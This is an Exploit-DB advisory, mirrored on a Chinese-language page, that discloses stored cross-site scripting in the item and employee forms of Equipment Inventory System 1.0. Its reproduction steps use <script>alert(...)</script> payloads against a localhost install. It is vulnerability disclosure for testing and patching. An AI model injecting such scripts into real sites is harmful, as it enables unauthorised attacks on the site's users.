Equipment Inventory System 1.0 – ‘multiple’ Stored XSS

  • 作者: Jitendra Kumar Tripathi
    日期: 2021-03-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49722/
  • # Exploit Title: Equipment Inventory System 1.0 - 'multiple' Stored XSS
    # Exploit Author: Jitendra Kumar Tripathi
    # Vendor Homepage: https://www.sourcecodester.com/php/11327/equipment-inventory.html
    # Software Link: https://www.sourcecodester.com/download-code?nid=11327&title=Equipment+Inventory+System+using+PHP+with+Source+Code
    # Version: 1
    # Tested on Windows 10 + Xampp 8.0.3
    
    Vulnerable Parameters: Item List , Employee Details , Position of Employee
    
    *Steps to reproduce:*
    1: Log in with a valid username and password. 
    
    2: Navigate to http://localhost/deped/admin/item.php
     Add Item 
     Payload : <script>alert(1)</script>
    
     Navigate to http://localhost/deped/admin/employee.php
     Add Employee
     Payload : <script>alert(2)</script>
     
     Post Saved Sucessfully , reload your page or navigate to any page you will see these XSS triggered.